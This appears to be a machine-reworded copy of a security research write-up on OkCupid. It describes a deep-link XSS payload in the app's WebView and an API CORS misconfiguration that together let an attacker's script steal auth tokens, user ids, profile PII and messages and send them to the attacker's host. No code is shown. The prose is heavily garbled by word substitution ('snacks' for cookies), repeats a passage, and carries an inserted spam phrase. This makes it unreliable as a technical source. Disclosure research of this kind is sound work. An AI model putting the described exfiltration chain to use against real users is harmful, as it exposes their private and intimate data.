Fragile Data visibility & Performing actions with respect to the target

Fragile Data visibility & Performing actions with respect to the target

As much as this time, we’re able to launch the OkCupid application that is mobile a deep website website link, containing a harmful JavaScript rule when you look at the part parameter. The following screenshot shows the last XSS payload which loads jQuery and then lots JavaScript rule through the attacker’s host: (take note top of the part offers the XSS payload in addition to base section is the identical payload encoded with URL encoding):

The after screenshot shows an HTTP GET demand containing the ultimate XSS payload (part parameter):

The host replicates the payload delivered previous into the part parameter while the injected code that is javaScript performed when you look at the context regarding the WebView.

A script file from the attacker’s server as mentioned before, the final XSS payload loads. The loaded code that is javaScript be properly used for exfiltration and account contains 3 functions:

  1. steal_token – Steals users’ verification token, oauthAccessToken, while the users’ id, userid. Users’ sensitive information (PII), such as for example email, is exfiltrated also.
  2. steal_data – Steals users’ profile and data that are private choices, users’ characteristics ( e.g. responses filled during registration) how to delete love and seek account, and much more.
  3. Send_data_to_attacker – send the data collected in functions 1 and 2 towards the attacker’s host.

steal_token function:

The big event produces A api call to the host. Users cookies that are provided for the host considering that the XSS payload is performed within the context of this application’s WebView.

The host responds by having A json that is vast the users’ id plus the authentication token too:

Steal information function:

An HTTP is created by the function request endpoint.

In line with the information exfiltrated into the function that is steal_token the demand has been delivered because of the verification token as well as the user’s id.

The host reacts with the information about the victim’s profile, including e-mail, intimate orientation, height, family members status, etc.

Forward data to attacker function:

The big event produces a POST request to your attacker’s host containing all the details retrieved in the function that is previous (steal_token and steal_data functions).

The screenshot that is following an HTTP POST demand provided for the attacker’s host. The demand human body contains all the victim’s information that is sensitive

Performing actions with respect to the target can also be feasible as a result of the exfiltration associated with the victim’s verification token and also the users’ id. These details is employed within the harmful JavaScript rule (just like used in the steal_data function).

An attacker can perform actions such as forward messages and alter profile data as a result of information exfiltrated when you look at the function that is steal_token

  1. Authentication token, oauthAccessToken, can be used into the authorization header (bearer value).
  2. Consumer id, userId, is added as needed.

Note: An attacker cannot perform complete account takeover because the cookies are protected with HTTPOnly.

the info exfiltrated into the function that is steal_token

  1. Authentication token, oauthAccessToken, can be used into the authorization header (bearer value).
  2. Consumer id, userId, is added as needed.

Note: An attacker cannot perform account that is full considering that the snacks are protected with HTTPOnly.

Internet System Vulnerabilities Mis-configured Cross-Origin Site Sharing Policy Results In Fragile Information Publicity

for the duration of the investigation, we now have discovered that the CORS policy regarding the API host api.OkCupid.com just isn’t configured correctly and any beginning can deliver demands to your host and read its’ reactions. The following demand shows a demand delivered the API host through the beginning

The host doesn’t validate the origin properly and reacts because of the required information. Furthermore, the host reaction contains Access-Control-Allow-Origin: and Access-Control-Allow-Credentials: real headers:

Only at that point on, we discovered that people can deliver needs towards the API host from our domain without having to be obstructed because of the CORS policy.

The moment a target is authenticated on OkCupid browsing and application towards the attacker’s internet application, an HTTP GET demand is delivered to containing the victim’s snacks. The server’s reaction has a vast json, containing the victim’s verification token as well as the victim’s user_id.

We’re able to find a lot more of good use information in the bootstrap API endpoint – sensitive and painful API endpoints into the API host:

The screenshot that is following delicate PII data exfiltration from the /profile/ API endpoint, utilizing the victim’s user_id while the access_token:

The after screenshot shows exfiltration associated with the victim’s communications through the /1/messages/ API endpoint, utilizing the victim’s user_id plus the access_token:

Summary

The planet of online-dating apps has continued to develop quickly over the years, and matured to where it is at today with all the change up to a electronic globe, specially in the past 6 months – considering that the outbreak of Coronavirus around the world. The “new normal” habits such as for instance as “social distancing” have actually forced the dating globe to solely count on electronic tools for help.

The study introduced right right here shows the potential risks related to one of several longest-established & most apps that are popular its sector. The need that is dire privacy and information safety becomes more important whenever plenty personal and intimate information being stored, handled and analyzed in a application. The platform and app was made to create individuals together, but needless to say where individuals get, crooks will observe, in search of effortless pickings.

Leave a Reply

Your email address will not be published. Required fields are marked *